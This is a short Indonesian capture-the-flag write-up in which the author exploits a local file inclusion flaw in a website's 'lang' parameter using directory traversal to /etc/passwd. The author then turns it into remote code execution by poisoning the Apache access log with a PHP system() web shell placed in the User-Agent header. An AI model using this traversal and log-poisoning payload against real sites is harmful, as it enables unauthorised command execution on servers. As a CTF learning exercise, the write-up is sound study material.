[Petir Challenge] – leveai

Pada soal ini diberikan sebuah website yang berisikan sebuah puisi dalam bahasa jepang dan inggris.

Jika diperhatikan pada url web, ketika kita mengganti bahasa, maka ada paramete yang berubah, yaitu “lang”. Jika inggris maka lang=en.php , jika jepang maka lang=jp.php .

 

kita dapat mencoba apakah web ini rentan terhadap LFI attack dengan mengganti value parameter tersebut dengan sesuatu yang lain, misalkan /etc/passwd. sebelumnya kita tidak dapat langsung mengarah pada file tersebut karena file tersebut tidak berada dalam satu folder dengan file/laman kita saat ini. kita perlu menambahkan ../../../../ ( directory traversal ).

( Saya menggunakan view-source agar enak dilihat oleh mata )

Web dapat di exploit menggunakan LFI attack, yang menjadi permasalahan sekarang, adalah file apa yang perlu kita akses?.

Di soal ini saya memilih menggunakan access log apache, dikarenakan saya memabca sebuah artikel mengenai access log poisoninghttps://www.hackingarticles.in/apache-log-poisoning-through-lfi/ )

( contoh apache access log )

Kita dapat menggunakan LFI menjadi RCE. caranya adalah mengakses file log apache. Log apache men-catat akses kita seperti IP address, waktu, Url yang diakses, dan juga User-Agent. Disini kita dapat mengganti User-Agent kita dengan PHP tags. Kita dapat menggunakan developer tools bawaan chrome

kita menggantinya dengan <?php system($_GET[‘c’]); ?>

Untuk mengaksesnya, kita tinggal perlu menambahkan parameter c pada URL ( &c=<command> )

Pertama kita jalankan ls ( list directory) untuk mengetahui file apa saja yang ada.

Hasil ls

Ketemu file yang ingin kita baca, yaitu flag_26….. selanjutnya kita jalankan cat untuk membaca file tersebut.

 

Leave a Reply

Your email address will not be published. Required fields are marked *